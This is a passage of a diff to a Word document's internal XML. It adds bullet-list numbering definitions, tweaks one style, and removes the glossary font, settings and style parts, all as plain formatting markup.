+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="B088C494" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="F3DCC692" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4CC20628" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="78EF40C1"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="F63CDFA2"/>
+    <w:lvl w:ilvl="0" w:tplc="FCB8B702">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="5EA20240">
+      <w:start w:val="23"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="–"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="BA1099C8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="36E2E22E" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="B2BEA172" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="055AB9EC" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4AD8AF8A" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="EAECF02A" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="147E72E2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -1804,7 +3482,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -1995,515 +3672,31 @@
       <w:spacing w:after="100"/>
     </w:pPr>
   </w:style>
-</w:styles>
-</file>
-
-<file path=word/glossary/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:glossaryDocument xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"/>
-</file>
-
-<file path=word/glossary/fontTable.xml><?xml version="1.0" encoding="utf-8"?>
-<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15">
-  <w:font w:name="Calibri">
-    <w:panose1 w:val="020F0502020204030204"/>
-    <w:charset w:val="00"/>
-    <w:family w:val="swiss"/>
-    <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E00002FF" w:usb1="4000ACFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
-  </w:font>
-  <w:font w:name="Times New Roman">
-    <w:panose1 w:val="02020603050405020304"/>
-    <w:charset w:val="00"/>
-    <w:family w:val="roman"/>
-    <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002EFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
-  </w:font>
-  <w:font w:name="Calibri Light">
-    <w:panose1 w:val="020F0302020204030204"/>
-    <w:charset w:val="00"/>
-    <w:family w:val="swiss"/>
-    <w:pitch w:val="variable"/>
-    <w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
-  </w:font>
-</w:fonts>
-</file>
-
-<file path=word/glossary/settings.xml><?xml version="1.0" encoding="utf-8"?>
-<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15">
-  <w:view w:val="normal"/>
-  <w:defaultTabStop w:val="720"/>
-  <w:characterSpacingControl w:val="doNotCompress"/>
-  <w:compat>
-    <w:useFELayout/>
-    <w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/>
-    <w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
-    <w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
-    <w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
-    <w:compatSetting w:name="differentiateMultirowTableHeaders" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/>
-  </w:compat>
-  <w:rsids>
-    <w:rsidRoot w:val="00CA41D4"/>
-    <w:rsid w:val="00B06D53"/>
-    <w:rsid w:val="00CA41D4"/>
-  </w:rsids>
-  <m:mathPr>
-    <m:mathFont m:val="Cambria Math"/>
-    <m:brkBin m:val="before"/>
-    <m:brkBinSub m:val="--"/>
-    <m:smallFrac m:val="0"/>
-    <m:dispDef/>
-    <m:lMargin m:val="0"/>
-    <m:rMargin m:val="0"/>
-    <m:defJc m:val="centerGroup"/>
-    <m:wrapIndent m:val="1440"/>
-    <m:intLim m:val="subSup"/>
-    <m:naryLim m:val="undOvr"/>
-  </m:mathPr>
-  <w:themeFontLang w:val="en-GB"/>
-  <w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/>
-  <w:decimalSymbol w:val="."/>
-  <w:listSeparator w:val=","/>
-  <w15:chartTrackingRefBased/>
-</w:settings>
-</file>
-
-<file path=word/glossary/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15">
-  <w:docDefaults>
-    <w:rPrDefault>
-      <w:rPr>
-        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-        <w:sz w:val="22"/>
-        <w:szCs w:val="22"/>
-        <w:lang w:val="en-GB" w:eastAsia="en-GB" w:bidi="ar-SA"/>
-      </w:rPr>
-    </w:rPrDefault>
-    <w:pPrDefault>
-      <w:pPr>
-        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
-      </w:pPr>
-    </w:pPrDefault>
-  </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="371">
-    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
-    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
-    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
-    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
-    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
-    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
